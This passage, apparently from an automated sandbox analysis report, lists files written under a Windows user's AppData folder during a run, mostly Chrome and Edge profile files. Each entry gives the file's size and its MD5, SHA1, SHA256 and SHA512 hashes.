                                                                                                                  b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                                                  SHA512

                                                                                                                  c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                                                • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                  Filesize

                                                                                                                  4B

                                                                                                                  MD5

                                                                                                                  f49655f856acb8884cc0ace29216f511

                                                                                                                  SHA1

                                                                                                                  cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                  SHA256

                                                                                                                  7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                  SHA512

                                                                                                                  599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                  Filesize

                                                                                                                  944B

                                                                                                                  MD5

                                                                                                                  6bd369f7c74a28194c991ed1404da30f

                                                                                                                  SHA1

                                                                                                                  0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                                                  SHA256

                                                                                                                  878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                                                  SHA512

                                                                                                                  8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                  Filesize

                                                                                                                  649B

                                                                                                                  MD5

                                                                                                                  3555ff5f0f3ef6f0f024718d39c7c18a

                                                                                                                  SHA1

                                                                                                                  e2a44ab74d5d7177ae0667290cfcfb1d4873c149

                                                                                                                  SHA256

                                                                                                                  5fcb36976f27da121430176166652396c00d08fff5b64f0547556e3b244c3704

                                                                                                                  SHA512

                                                                                                                  ed8e0f8fa5a11105bfb636ac02ad5b9d68e8ba36194f6dab68f41a929d2e9f9a28edb1ff6f4625f47aa53d2d1c5876481e6f1c264e253f14f8c5dd139a95fb74

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                  Filesize

                                                                                                                  264KB

                                                                                                                  MD5

                                                                                                                  f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                  SHA1

                                                                                                                  112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                  SHA256

                                                                                                                  b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                  SHA512

                                                                                                                  bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

                                                                                                                  Filesize

                                                                                                                  851B

                                                                                                                  MD5

                                                                                                                  07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                                  SHA1

                                                                                                                  6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                                  SHA256

                                                                                                                  6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                                  SHA512

                                                                                                                  7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

                                                                                                                  Filesize

                                                                                                                  854B

                                                                                                                  MD5

                                                                                                                  4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                  SHA1

                                                                                                                  fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                  SHA256

                                                                                                                  6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                  SHA512

                                                                                                                  939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                  Filesize

                                                                                                                  1KB

                                                                                                                  MD5

                                                                                                                  a49e589b525fb28cffd489f82750bc98

                                                                                                                  SHA1

                                                                                                                  2b904ccfbaddd3c262694828008d8c78e6a0dfac

                                                                                                                  SHA256

                                                                                                                  7c82bab63476faba7575cd232f2eb7699bc20d83ebe889fdce4342affad49102

                                                                                                                  SHA512

                                                                                                                  65a8f40ecf99cb2c5bdcbd56bd534bb898652834dcf821833fe72a1d37e7367c6fc9b4096baa3daf2b37a7aaf1bc0647b1e289c4384fd6eaff0aca8e9075defe

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                  Filesize

                                                                                                                  2B

                                                                                                                  MD5

                                                                                                                  d751713988987e9331980363e24189ce

                                                                                                                  SHA1

                                                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                  SHA256

                                                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                  SHA512

                                                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                  Filesize

                                                                                                                  356B

                                                                                                                  MD5

                                                                                                                  e61f93c2088c6c1541c5254fb87b6eea

                                                                                                                  SHA1

                                                                                                                  a639cd6907e3fc6eced3bc82965e276ef155d4eb

                                                                                                                  SHA256

                                                                                                                  d5671e682468b99bffc94cb48b88ff05c698e53c85ef5f1ffe24946a0b7d037b

                                                                                                                  SHA512

                                                                                                                  53ba60210f7834bb452c1b6daf124c563def9e7e234fc71d893a40bfbb75ead84b6b76482987840111b41ea73dc4ae2e5c33c5991456e2a40ab2997f123cf4ac

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  9KB

                                                                                                                  MD5

                                                                                                                  8a3f037e571ec40a2b1844652a482a6e

                                                                                                                  SHA1

                                                                                                                  1af1e01779861ff15e14a5cfd9cd2500bca35488

                                                                                                                  SHA256

                                                                                                                  9db3119f6d71e50ce2cf58e0c2d4d1a1139dc30e562a327161de8f1bdaff1789

                                                                                                                  SHA512

                                                                                                                  eb09fe90a74c9d5147e89e6b9d04f3d1b7c76014364d763dcb02203612ae029fc65dc1ac3717d64716c0799ba7038cc0aa39b2681334df5ab36e8eb4a10c1c02

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                  Filesize

                                                                                                                  15KB

                                                                                                                  MD5

                                                                                                                  807b8de8d38ad9721c9c5fd0b9b32c3c

                                                                                                                  SHA1

                                                                                                                  cef1363b35094669d7ec569738130ce96039f7c0

                                                                                                                  SHA256

                                                                                                                  e1e1acdac16947efd18c4b5c21de52d1ff54b7e17e8ba66b2227b93b454e5980

                                                                                                                  SHA512

                                                                                                                  69cea14dde8f59d49980f9ded08d012cdf4c50b657345a78550d6d9626198f959df1354ec673202c37f042ee3bd4a439aaaaf9e240b8dc691d87821a1ac5bd55

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                  Filesize

                                                                                                                  72B

                                                                                                                  MD5

                                                                                                                  28daa9061f8aeed50d6b6b68ce0b2a28

                                                                                                                  SHA1

                                                                                                                  3643f9ba7f1e44452a355e911b7f4191d88cedd5

                                                                                                                  SHA256

                                                                                                                  307a6c7320ddbd688e862ddc06765d1d4e9be011f89e5ffd87feac2d60d53273

                                                                                                                  SHA512

                                                                                                                  acbd1be96f929416a2c68548fa2d0f0b7b0b39b475176f5304bbddd9c82c0d7b5f038462ba9c3589842bb255023aca183787b625eb819f452abf197b28b0b6ca

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                  Filesize

                                                                                                                  233KB

                                                                                                                  MD5

                                                                                                                  f2ef050c91e55ee5689eb9eb972c686d

                                                                                                                  SHA1

                                                                                                                  ee838d5f0e05a07c016c4f5ab0ad2f1e054b25f2

                                                                                                                  SHA256

                                                                                                                  f71e495986e510f8dd7415a0aa6d87f7e18da67ccbdd6a41f94970d0ca19b890

                                                                                                                  SHA512

                                                                                                                  67fac1856d1d4dd8ef06437c43449959d1ebdec76c56f9e7b9de2c524afd4367263f563c8108089643d8d0f5f6cec16de6ca5e031d1e2b576a45392c2cde4ae4

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  557df060b24d910f788843324c70707a

                                                                                                                  SHA1

                                                                                                                  e5d15be40f23484b3d9b77c19658adcb6e1da45c

                                                                                                                  SHA256

                                                                                                                  83cb7d7b4f4a9b084202fef8723df5c5b78f2af1a60e5a4c25a8ed407b5bf53b

                                                                                                                  SHA512

                                                                                                                  78df1a48eed7d2d297aa87b41540d64a94f5aa356b9fc5c97b32ab4d58a8bc3ba02ce829aed27d693f7ab01d31d5f2052c3ebf0129f27dd164416ea65edc911c

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  843402bd30bd238629acedf42a0dcb51

                                                                                                                  SHA1

                                                                                                                  050e6aa6f2c5b862c224e5852cdfb84db9a79bbc

                                                                                                                  SHA256

                                                                                                                  692f41363d887f712ab0862a8c317e4b62ba6a0294b238ea8c1ad4ac0fbcda7a

                                                                                                                  SHA512

                                                                                                                  977ec0f2943ad3adb9cff7e964d73f3dadc53283329248994f8c6246dfafbf2af3b25818c54f94cc73cd99f01888e84254d5435e28961db40bccbbf24e966167

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  49466246aa9c46b768ccb553e4637c69

                                                                                                                  SHA1

                                                                                                                  45ae4672cca17acf9bfdf21ff5660b3ae4d59911

                                                                                                                  SHA256

                                                                                                                  f968489d33c5c8b6b1d4346326cb9810f798564982b323239e3bda9f97531f70

                                                                                                                  SHA512

                                                                                                                  3f17c3b1502412707cf284c35c745f564749f052bfdc408b1aa7deb172c3993fc88b89777c92e9422fdb1556656d25ec3e2dc4f1f9d11f7666af2fa0324fe607

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  5e12c0611d157bc724c09b7969a9f7c1

                                                                                                                  SHA1

                                                                                                                  3fe4db066ee0d6534167884c1b694b732116eb5e

                                                                                                                  SHA256

                                                                                                                  052d64a1ab0d81a373b31a309b882a0958fbe8198742a3d6fecf50ee0e3d2d5e

                                                                                                                  SHA512

                                                                                                                  f196d825c97d5a6fec5cd8c470148bac117fafe2427d1c1c8da36416508fdc67c2d8f8c0da1e1cd35bcb81766ab941ac872a94bd51e126063b4325e85c79c824

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  152B

                                                                                                                  MD5

                                                                                                                  b6095cbf4f1ec21b2268d63e9418326f

                                                                                                                  SHA1

                                                                                                                  4552d2b82ab0052e10271c3407b75c72fc4221dc

                                                                                                                  SHA256

                                                                                                                  b6b1cf56f0974eb24a3a0d781676401074b0c48e5fa633a6885564484993feb2

                                                                                                                  SHA512

                                                                                                                  329da01caf2bea82da100a3a17496ae549e3d5cb962c6ad42ffec1f925537f4ced883de80efcdad981f3c1d92dbd139556c5bf38d50ef42bc62899f7549fb344

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\678a390e-3a50-45d9-bb62-d20885010b13.tmp

                                                                                                                  Filesize

                                                                                                                  1B

                                                                                                                  MD5

                                                                                                                  5058f1af8388633f609cadb75a75dc9d

                                                                                                                  SHA1

                                                                                                                  3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                  SHA256

                                                                                                                  cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                  SHA512

                                                                                                                  0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                  Filesize

                                                                                                                  48B

                                                                                                                  MD5

                                                                                                                  cec932db7206c4d288cbd2bd9510f74b

                                                                                                                  SHA1

                                                                                                                  7d64f383688bacf5a6237ae8e1c21aa5889ebe25

                                                                                                                  SHA256

                                                                                                                  e75d853047ee49f34fd3f8fde63e481de7b307882553a2187fc698658b383cb4

                                                                                                                  SHA512

                                                                                                                  d55c92c69a4996ab7f9873e9d8f54469d11b3e49e5e229010f44c17cd73c4b8ae273c7696d69b6f372817aee0601482facb246c82e4c0583ef1dea0a8c28c007

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  0a91a27261b0e60297822604ec0b2668

                                                                                                                  SHA1

                                                                                                                  d0ad8a5d7ca1d9248865d295ee6c78a7cd729503

                                                                                                                  SHA256

                                                                                                                  1cbe481f31487fb27da33c0b3b490d0cae679f4771c9c919007187c90e7057e6

                                                                                                                  SHA512

                                                                                                                  511c26f371dc46886de0e93870c83458ab24f1cc42199abbc0b6a5e55b62f820d56337e1452ab6a1a822a35fc5030322be491de4bf7dc30837a9a18c9d9de401

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  e98bd142c55869581a1fc95888ecda66

                                                                                                                  SHA1

                                                                                                                  67e6f2a2f686c2f558a67462983a334882773634

                                                                                                                  SHA256

                                                                                                                  c068f7915a58a6ad7b7de3c6d1ec60e39900d251dc6579f508078d7c76417a9b

                                                                                                                  SHA512

                                                                                                                  b01faf6fb882fe7f443d28f1f4f66b37c45f7cbb3e2fd114584b7cc1d0975539aa24171d0fac39d24fb1108f62299adf3b7a3833adc984311d8bdf1d3cb5f45a

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                  Filesize

                                                                                                                  70KB

                                                                                                                  MD5

                                                                                                                  e5e3377341056643b0494b6842c0b544

                                                                                                                  SHA1

                                                                                                                  d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                                  SHA256

                                                                                                                  e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                                  SHA512

                                                                                                                  83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                  Filesize

                                                                                                                  56KB

                                                                                                                  MD5

                                                                                                                  2bc4f6f9ae4b4d0073f848c46ac52983

                                                                                                                  SHA1

                                                                                                                  0c8965475be6ee7ae74f9872efccc30e9eb69846

                                                                                                                  SHA256

                                                                                                                  3b2a8dce531ab481cbf364bd02f520619ebc18655dec0dd8b092d141a6731950

                                                                                                                  SHA512

                                                                                                                  5dc398eed17cebf7d0052aeff3bf82ba4bb7f60f52b9c7a92855bfdb579866aadad43f4274fa4ca1daed7fa855f7f94d7129ae2d6337e07f866324968571fe59

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                  Filesize

                                                                                                                  124KB

                                                                                                                  MD5

                                                                                                                  d4d5ce995ca0a9a6bd6fa14611def56f

                                                                                                                  SHA1

                                                                                                                  525e67f39e6d76b2b30b85f64bbb8ccc0731d392

                                                                                                                  SHA256

                                                                                                                  306af811ac70dbc15f1220c509c213be85400e0e5670a0125666589e9aa8c812

                                                                                                                  SHA512

                                                                                                                  d96831c50882ebbde4bff3434f72bd82cdb4b8c1ce6a93be2fbbb33bb27faf53a8b25e05a24a81f1ef7b8a0176db5c9290d7dec39485ede89c0139eb2c145f01

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

                                                                                                                  Filesize

                                                                                                                  1KB

                                                                                                                  MD5

                                                                                                                  c10faad6ee947d9aec42c661d5116a00

                                                                                                                  SHA1

                                                                                                                  72edaf75b5ea52b88d6184bc41d9e8b99c6bb72f

                                                                                                                  SHA256

                                                                                                                  c023c3169e95472742625deea7869eb1152798ed0b3b245f42b7e690232d6aba

                                                                                                                  SHA512

                                                                                                                  42100f6ed3f340b7244f5887d4a4e741b9a858e2183a7cebddd033affb6744277cf4fdad1f4b880f8310d705105e0781b8f5fadfac394e072be3cc1891bea1af

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\CURRENT

                                                                                                                  Filesize

                                                                                                                  16B

                                                                                                                  MD5

                                                                                                                  46295cac801e5d4857d09837238a6394

                                                                                                                  SHA1

                                                                                                                  44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                  SHA256

                                                                                                                  0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                  SHA512

                                                                                                                  8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                  Filesize

                                                                                                                  41B

                                                                                                                  MD5

                                                                                                                  5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                  SHA1

                                                                                                                  d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                  SHA256

                                                                                                                  f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                  SHA512

                                                                                                                  de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                  Filesize

                                                                                                                  111B

                                                                                                                  MD5

                                                                                                                  285252a2f6327d41eab203dc2f402c67

                                                                                                                  SHA1

                                                                                                                  acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                  SHA256

                                                                                                                  5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                  SHA512

                                                                                                                  11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                  Filesize

                                                                                                                  836B

                                                                                                                  MD5

                                                                                                                  17355fc2eb20ecf1dc90b73cc641bf69

                                                                                                                  SHA1

                                                                                                                  f110aa940c8a4dca48aed43ca7d4175c375cb9da

                                                                                                                  SHA256

                                                                                                                  ca390697c1718205504fd8d2cef6c8cb1abc53cd38291e798cc45997eb0c6b27

                                                                                                                  SHA512

                                                                                                                  e51cc8d92fa3f97f848881af3c5d3b5f0800b41c8e7fbe686b2d0856fe5ac2baaef7938b3587c226995e1ec3fb828c6ac4b49a57d430160bf176ae28bc45d52e

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                  Filesize

                                                                                                                  836B

                                                                                                                  MD5

                                                                                                                  914708677caf05aae5c217b1d2c5a9b1

                                                                                                                  SHA1

                                                                                                                  72d2ad0519ea9ec32e846cc98ca079041867d3b0

                                                                                                                  SHA256

                                                                                                                  03241e2eb9812a49f3ca3900e7af1ef764d0c6897c2ba71fd9da2ab3b24d62bd

                                                                                                                  SHA512

                                                                                                                  a305d6d4a9f10f97a8333fe62f36074b5f4646d6a025b41fd4ddd04593bca94be1716c747efe41014337d5017e144ef47b1e7d226b7175bd83e07befae7f481c

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  6KB

                                                                                                                  MD5

                                                                                                                  8151504c4d4104b04ad8dd1f99c99b2a

                                                                                                                  SHA1

                                                                                                                  7e4c6e705425360f8299704f050695ce99460df3

                                                                                                                  SHA256

                                                                                                                  f198d68bfdd1dd13d13085cb89d86a19727aff99559ac20ea3cf96f57c23cfe2

                                                                                                                  SHA512

                                                                                                                  26cdc3a3410a67a99f620bce410e86bf4ef481f8710ef06e4b5c985d25b7264119a9c2d23861e8fb55dfe12ce1ce671186e0ad46ead3b9c6eac5be9824791185

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  6KB

                                                                                                                  MD5

                                                                                                                  2bb59fd5ded16810d17c8315b1f721a4

                                                                                                                  SHA1

                                                                                                                  fdcf86fbf7f27c6f013cb27efed9caa9ee4e4c42

                                                                                                                  SHA256

                                                                                                                  52628e9e13a357f233eaabd3c5c4e440d4ff23887932e4a181aff4f7bf2da303

                                                                                                                  SHA512

                                                                                                                  512dabd64bbfebe295366e4193ca2d9012ff4069ae29c5fa08fedec06c4493cc72430dda6df475649c96274021302185bcd143913091db60728c3f7c42b3ec01

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                  MD5

                                                                                                                  236ee39f43e48048b50d3dcf6059a02a

                                                                                                                  SHA1

                                                                                                                  be2d72f29b33c8672fc3dfb135de90c0ae00e6e3

                                                                                                                  SHA256

                                                                                                                  e1f70f97e1f38f5e7087567b933befe813c930e819ead446f54d39d514fffc37

                                                                                                                  SHA512

                                                                                                                  264c4dd108d47ebf52b68ab00dec2c65b2b08f5ca13e2f9368b2e3b4ec6450299c092e2801b5a8135df9eadb683f08cba2899760b8df8c95d1ede31ae3964c05

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  5KB

                                                                                                                  MD5

                                                                                                                  c7221340a87d7a0b8c7e231f8566a0f2

                                                                                                                  SHA1

                                                                                                                  e4685bcc1484fef286140bf6073922452bfb9647

                                                                                                                  SHA256

                                                                                                                  ab6ecf8e944e8bd26d0d699724155fac074884551aa3fa4f47012b713683482a

                                                                                                                  SHA512

                                                                                                                  e4a936c47e7f919d9d9ed4e76831981220bff973bcc904e23730a8f9ecfa27f76ebccc42ab70a7776f3c5f83d4ba066d0335cf89bad3a814a1ff1aeb4367b248

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  5KB

                                                                                                                  MD5

                                                                                                                  68d675fe86315fef75fa8b5851a33817

                                                                                                                  SHA1

                                                                                                                  623de613b971aa234925aeb167aa1fc4d081b8fc

                                                                                                                  SHA256

                                                                                                                  247e7426dffbdcf56d1a5e8c6d50113033113975d158c5d9e22b0b927aa2bd01

                                                                                                                  SHA512

                                                                                                                  0774582042730bab0547f3e9ead057edd797779d5bb9514a493dde638eff1b20527f4afc1aa8db24dd151ad4fb11a9310ad4e2ccf467ec691acd12e5de35b453

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  6KB

                                                                                                                  MD5

                                                                                                                  420d693343ef8136503d2ee36c197499

                                                                                                                  SHA1

                                                                                                                  ef7d66e28358ee2898a22ba6bd86d9884bfa30ea

                                                                                                                  SHA256

                                                                                                                  b11e55762faa6778a863ef58c0a6b2544a23ad6feb7de866daefeccff1e472a3

                                                                                                                  SHA512

                                                                                                                  8751be85b6712771314838bfdc812f26de9797ccf3abe586e71d8770a37e71905e4f2806fc94acd959a94bfe0553b3f383b425bbb647fdf9f89e29b4d2440af2

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                  Filesize

                                                                                                                  24KB

                                                                                                                  MD5

                                                                                                                  952a6e3cbc50f011cf2f04c9470080ff

                                                                                                                  SHA1

                                                                                                                  a0d6a2509af73e523c970f6e4351861bde63d6db

                                                                                                                  SHA256

                                                                                                                  faa79ba7dfd140106187ab50f14aa7cca13650f94f796419bc0a44d7a2b79d5f

                                                                                                                  SHA512

                                                                                                                  7955092a6086f05268e4b0f88648d9275020b6cad83f81c90eac5a7cd994cc243b8dfab579d4335db62f3577fd2d8a7fbefcad6cc615e2bcf1d014115056cde4

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                  Filesize

                                                                                                                  24KB

                                                                                                                  MD5

                                                                                                                  74d9eb5260fef5b115bec73a0af9ac54

                                                                                                                  SHA1

                                                                                                                  18862574f0044f4591a2c3cf156db8f237787acf

                                                                                                                  SHA256

                                                                                                                  7d7e7b38664d625a0bbffbcb7882b175709e92987bf9da113c4745fafbbc361d

                                                                                                                  SHA512

                                                                                                                  b85917201b1d4b4542a4424ce40ddd083ddbd0e230e1931fe6f7cdd2aa3d8a0eec8daa743ddc5467f0a92da5594144c602081d941b216ca9cafdfd3c150d32d2

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                  Filesize

                                                                                                                  24KB

                                                                                                                  MD5

                                                                                                                  7ec974d6450b1d66b1603b4d8ab6f311

                                                                                                                  SHA1

                                                                                                                  a69718ede5e64505d611081ce519c13bf1874c71

                                                                                                                  SHA256

                                                                                                                  c8f35daf396d3857417f59817d58bd0d546a726b6d8a00a8a1c2d158623a721c

                                                                                                                  SHA512

                                                                                                                  9a524e266bc6b297d510d791445a6c014684c7d583037e2e40c8ad5e886e49f843662afc3c39cc9c82ae9d165e0a9ef3345dc800eb0655ca70b0769bf207bd2b

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13378035454670852

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  b206637d63656ecb7e5eb49c67b709cb

                                                                                                                  SHA1

                                                                                                                  a84b69ded533528d426a1814d1b21b9b4435aaa3

                                                                                                                  SHA256

                                                                                                                  3f01943f4a1c163e33531e88a23dd7188eb41b373ceb1bf38e07bcea7b186d21

                                                                                                                  SHA512

                                                                                                                  511a739d622ff10016315c7abdafe64c7c8b852d61a793072ff62d634747ce8e9c855dd61c1fbf3d11fa3e1db4dacde642f7dae57ac6f906e73c47328187197a

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                  Filesize

                                                                                                                  112B

                                                                                                                  MD5

                                                                                                                  c637c89eba3c091eb604e1c852a54aa0

                                                                                                                  SHA1

                                                                                                                  a4c435dacbbf982eb397bfc495dba5bd885f7aef

                                                                                                                  SHA256

                                                                                                                  2d14e08bbe78f260c1544d8edf23c3bebf2f1af7ba289aa32577dd08de780958

                                                                                                                  SHA512

                                                                                                                  60b94b748c9ec9dce7ea948ec55f91c2b9c81746d3ce927665b0d17f260a7735397a0bfd8e3e890f1918da5d3caab9adfc2de9d6318f30d63723dccac8c089ce

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                  Filesize

                                                                                                                  347B

                                                                                                                  MD5

                                                                                                                  e3930acf49bdaccd89627811a4c55dd1

                                                                                                                  SHA1

                                                                                                                  9426ef1c28ee4a974ca3e9bb59b18e1076d2ae65

                                                                                                                  SHA256

                                                                                                                  813fda83811f8695f5cebd61dc4f7005c17e1a3b43db45c8eb30021c606b864a

                                                                                                                  SHA512

                                                                                                                  eb93df9c97b28a6f0bc3e00dbb292be5d0b39d17133ec244c6626a6b451dae933824e7e6b190db79eba71c88332f462791ce8b2a08da589df30d853103391505

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                  Filesize

                                                                                                                  326B

                                                                                                                  MD5

                                                                                                                  9daac5b38dc4b1ffcdd84553b05deb0d

                                                                                                                  SHA1

                                                                                                                  2c4e9f739eda964b6c2437b7c13b31f245886afd

                                                                                                                  SHA256

